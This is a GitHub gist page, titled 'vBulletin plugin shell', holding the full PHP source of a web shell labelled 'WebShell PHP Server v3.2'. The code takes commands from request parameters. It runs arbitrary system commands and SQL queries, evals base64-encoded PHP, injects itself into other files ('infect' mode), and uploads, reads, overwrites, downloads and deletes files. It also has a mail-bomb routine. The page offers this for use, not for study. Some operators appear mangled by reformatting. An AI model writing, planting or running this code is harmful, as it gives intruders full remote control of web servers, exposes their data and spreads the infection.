Skip to content

Instantly share code, notes, and snippets.

@kosborn

kosborn/gist:4861099

Created February 13, 2013 02:00
Show Gist options
  • Save kosborn/4861099 to your computer and use it in GitHub Desktop.
Save kosborn/4861099 to your computer and use it in GitHub Desktop.
Download ZIP
vBulletin plugin shell
Raw
gistfile1.txt
<?php
@set_time_limit(0);
$modearr = array("cmd", "sql", "infect", "upload", "ws_ver", "ws_remove", "ws_read", "ws_save", "ws_mail", "ws_eval", "ws_list", "ws_homedir", "ws_delete", "ws_makedir", "ws_rmdir", "ws_down");
$mode = $_REQUEST['mode'];
if (in_array($mode, $modearr)) {
function ws_stripslashes($string) {
if (get_magic_quotes_gpc()) {
return StripSlashes($string);
} else {
return $string;
}
}
if ($mode == "cmd") {
$cmd = $_REQUEST['cmd'];
if (function_exists('system')) {
system($cmd);
}
elseif(function_exists('exec')) {
exec($cmd, $output);
foreach($output as $line) {
echo$line.
"\n";
}
}
elseif(function_exists('shell_exec')) {
$output = shell_exec($cmd);
echo$output;
}
elseif(function_exists('popen')) {
$handle = popen($cmd, "r");
$read = fread($handle, 2096);
echo$read;
pclose($handle);
}
}
if ($mode == "sql") {
$host = $_REQUEST['host'];
$port = $_REQUEST['port'];
$username = $_REQUEST['username'];
$password = $_REQUEST['password'];
$dbname = $_REQUEST['dbname'];
$query = $_REQUEST['query'];
$link = mysql_connect($host.
":".$port, $username, $password) or die('Could not connect: '.mysql_error());
if ($_REQUEST['sqlCmd'] == "getDbs") {
$db_list = mysql_list_dbs($link);
while ($row = mysql_fetch_object($db_list)) {
echo "Database: ".$row - > Database.
"\n";
}
mysql_free_result($db_list);
}
if ($_REQUEST['sqlCmd'] == "getTables") {
$result = mysql_list_tables($dbname);
$num_rows = mysql_num_rows($result);
for ($i = 0; $i < $num_rows; $i++) {
echo "Table: ".mysql_tablename($result, $i).
"\n";
}
mysql_free_result($result);
}
if (isset($query)) {
mysql_select_db($dbname, $link) or die('Could not select database');
$result = mysql_query(ws_stripslashes($query)) or die("nInvalid query: ".mysql_error());
while ($row = mysql_fetch_assoc($result)) {
echo "Row {\n";
foreach($row as $variable = > $value) {
echo$variable.
"=".$value.
"\n";
}
echo "\n}\n";
}
}
mysql_close($link);
}
if ($mode == "infect") {
$handle = fopen($_REQUEST["sourceFile"], "r+") or die("Error reading source file");
$contents = "";
while (!feof($handle)) {
$contents. = fread($handle, 8192);
}
fclose($handle);
$handle = fopen($_REQUEST['infectFile'], "r") or die("Error reading infect file");
$contents2 = $contents.
"\n";
while (!feof($handle)) {
$contents2. = fread($handle, 8192);
}
fclose($handle);
$fp = fopen($_REQUEST['infectFile'], 'w') or die("Error writing infect file");
$write = fwrite($fp, $contents2);
fclose($fp);
if ($write) {
echo$_REQUEST['infectFile'].
" Infected";
}
}
if ($mode == "upload") {
if ($_FILES) {
if (is_uploaded_file($_FILES['file']['tmp_name'])) {
$uploadfile = basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $_REQUEST['dir'].$uploadfile)) {
echo $uploadfile.
" has been uploaded!.";
} else {
echo "Upload Failed!!!";
}
}
}
}
if ($mode == "ws_ver") {
echo "WebShell PHP Server v3.2";
}
if ($mode == "ws_remove") {
$handle = fopen($_REQUEST["file"], "r+") or die("Error reading file");
$contents = "";
while (!feof($handle)) {
$contents. = fread($handle, 8192);
}
fclose($handle);
$contents2 = preg_replace('/[<?\s]*eval.*\?>/si', '', $contents);
if ($contents2) {
$fp = fopen($_REQUEST['file'], 'w') or die("Error writing file");
$write = fwrite($fp, $contents2);
fclose($fp);
if ($write) {
echo "WebShell removed from ".$_REQUEST['file'];
}
} else {
echo "Didnt Find Shell";
}
}
if ($mode == "ws_read") {
$handle = fopen($_REQUEST['file'], "r") or die("Error with reading file");
$contents = "";
while (!feof($handle)) {
$contents. = fread($handle, 8192);
}
fclose($handle);
echo$contents;
}
if ($mode == "ws_save") {
$contents = ws_stripslashes($_REQUEST["contents"]);
$fp = fopen($_REQUEST['file'], 'w') or die("Error writing ".$_REQUEST['file'].
" file");
$write = fwrite($fp, $contents);
fclose($fp);
if ($write) {
echo$_REQUEST['file'].
" saved";
}
}
if ($mode == "ws_mail") {
$mailtimes = "1";
$headers = 'From: '.ws_stripslashes($_REQUEST['from']).
'';
while ($mailtimes <= $_REQUEST['times']) {
mail(ws_stripslashes($_REQUEST['to']), ws_stripslashes($_REQUEST['subject']), ws_stripslashes($_REQUEST['msg']), $headers);
$mailtimes++;
}
echo "Mail Bomb Complete";
}
if ($mode == "ws_eval") {
$php = $_REQUEST['php'];
eval(base64_decode(ws_stripslashes($php)));
}
if ($mode == "ws_list") {
$dir = $_REQUEST['dir'];
$hook = opendir($dir) or die('cant open dir');
while (false !== ($file = readdir($hook))) {
$fpath = $dir.$file;
if (is_dir($fpath)) {
if ($file != '.' && $file != '..') {
echo "Directory: ".$file.
"\n";
}
}
if ($file != '.' && $file != '..' && !is_dir($fpath)) {
echo "File: ".$file.
"\n";
}
}
}
if ($mode == "ws_homedir") {
echo$_SERVER["DOCUMENT_ROOT"];
}
if ($mode == "ws_delete") {
unlink($_REQUEST['file']) or die('Cant delete file');
echo "File Deleted";
}
if ($mode == "ws_makedir") {
mkdir($_REQUEST['dir'], $_REQUEST['chmod']) or die('Cant create dir');
echo "Directory Created";
}
if ($mode == "ws_rmdir") {
rmdir($_REQUEST['dir']) or die('Cant remove dir');
echo "Directory Removed";
}
if ($mode == "ws_down") {
header('Content-type: application/octet-stream');
header('Content-Disposition: attachment; filename='.$_REQUEST['file'].
'');
readfile($_REQUEST['file']);
}
die();
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment